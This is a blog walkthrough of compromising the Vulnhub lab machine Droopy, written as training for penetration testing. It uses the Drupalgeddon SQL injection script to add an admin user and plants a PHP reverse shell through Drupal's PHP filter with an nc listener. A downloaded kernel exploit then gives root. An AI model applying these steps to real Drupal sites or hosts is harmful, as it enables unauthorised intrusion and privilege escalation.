Muzec's Cyber Security Blog

Hack. Sleep. Repeat

View on GitHub

image

Yet again today we be working on another OSCP like box Droopy On vulnhub you can grab a copy here Download Droopy: v0.2

We always start with an nmap scan…..

Nmap -sC -sV -oA nmap <Target-IP>

┌──(muzec㉿Muzec-Security)-[~/Documents/Vulnhubs/droppy]
└─$ nmap -sC -sV -oA nmap 172.16.139.175        
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-12 10:01 EDT
Nmap scan report for 172.16.139.175
Host is up (0.00013s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Welcome to La fraude fiscale des grandes soci\xC3\xA9t\xC3\xA9s | La fraud...

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.32 seconds

Just a single port cool and a robots.txt directory cool let check the webpage to see what is running .

image

The CMS is drupal let check the robots.txt .

image

So i decided to check the /CHANGELOG.txt directory since it always hold drupal version let confirm it .

image

And we have the version let do a quick searchsploit on it .

┌──(muzec㉿Muzec-Security)-[~/Documents/Vulnhubs/droppy] └─$ searchsploit Drupal 7.30 ————————————————————————————————————————————- ——————————— Exploit Title | Path ————————————————————————————————————————————- ——————————— Drupal 7.0 < 7.31 - ‘Drupalgeddon’ SQL Injection (Add Admin User) | php/webapps/34992.py Drupal 7.0 < 7.31 - ‘Drupalgeddon’ SQL Injection (Admin Session) | php/webapps/44355.php Drupal 7.0 < 7.31 - ‘Drupalgeddon’ SQL Injection (PoC) (Reset Password) (1) | php/webapps/34984.py Drupal 7.0 < 7.31 - ‘Drupalgeddon’ SQL Injection (PoC) (Reset Password) (2) | php/webapps/34993.php Drupal 7.0 < 7.31 - ‘Drupalgeddon’ SQL Injection (Remote Code Execution) | php/webapps/35150.php Drupal < 7.34 - Denial of Service | php/dos/35415.txt Drupal < 7.58 - ‘Drupalgeddon3’ (Authenticated) Remote Code (Metasploit) | php/webapps/44557.rb Drupal < 7.58 - ‘Drupalgeddon3’ (Authenticated) Remote Code Execution (PoC) | php/webapps/44542.txt Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - ‘Drupalgeddon2’ Remote Code Execution | php/webapps/44449.rb Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - ‘Drupalgeddon2’ Remote Code Execution (Metasploit) | php/remote/44482.rb Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - ‘Drupalgeddon2’ Remote Code Execution (PoC) | php/webapps/44448.py Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) | php/remote/46510.rb Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution | php/webapps/46452.txt Drupal < 8.6.9 - REST Module Remote Code Execution | php/webapps/46459.py ————————————————————————————————————————————- ——————————— Shellcodes: No Results

And boom we some exploit let try the first one since it will be adding a new admin user sound cool right .

python 34992.py -t http://172.16.139.175/ -u muzec -p muzec

image

And user created let use it to log in .

image

Ahhhhh we are in awesome right?? lol now let try and get a reverse shell let do some setting first.

image

Click on Modules and scroll down and tick PHP filter and click on save .

image

Now let go back to the same Modules and click on permission close to the PHP filter .

image

Now let scroll down and tick Use the PHP code text format and save permission.

image

Now let click on Add content .

image

Click on article .

image

Now at title let name it shell and skip the tag and move to the body now we need a reverse shell code from pentestmonkey the php one which you can download it here Download PHP Reverse Shell .

Now let copy the reverse shell code to the body and make sure we add our Local-IP address and port also let start an Ncat listener.

image

Now at text format let pick PHP code .

image

Now let click on save going back to our listener we should have shell.

image

And boom we have shell .

image

Now let spawn a TTY shell .

                                                                                                                                                                       
┌──(muzec㉿Muzec-Security)-[~/Documents/Vulnhubs/droppy]
└─$ nc -nvlp 5555                       
listening on [any] 5555 ...
connect to [172.20.10.4] from (UNKNOWN) [172.20.10.4] 55347
Linux droopy 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
 18:37:44 up 40 min,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn ("/bin/bash")'
www-data@droopy:/$ 

Checking the home directory found a user but nothing interesting about it .

www-data@droopy:/home/gsuser$ ls
ls
drupal
www-data@droopy:/home/gsuser$ ls -la
ls -la
total 32
drwxr-xr-x 4 gsuser gsuser 4096 Apr 10  2016 .
drwxr-xr-x 3 root   root   4096 Dec 11  2014 ..
-rw-r--r-- 1 gsuser gsuser  220 Dec 11  2014 .bash_logout
-rw-r--r-- 1 gsuser gsuser 3637 Dec 11  2014 .bashrc
drwx------ 2 gsuser gsuser 4096 Dec 11  2014 .cache
-rw-r--r-- 1 gsuser gsuser  675 Dec 11  2014 .profile
-rw------- 1 root   root   1463 Dec 11  2014 .viminfo
drwxrwxr-x 2 gsuser gsuser 4096 Apr 11  2016 drupal
www-data@droopy:/home/gsuser$ 

Privilege Escalation

Going around found a credentials for MYSQL but nothing intesting in the databases so i decided to check for version .

image

uname -a

image

A quick google search and we found our exploit not sure but let give it a try .

image

Now let transfer it to the target with SimpleHTTPServer and wget .

image

Now let compile the exploit.

gcc 37292.c -o exploit now let run it .

image

Boom we are root .

Greeting From Muzec



Back To Home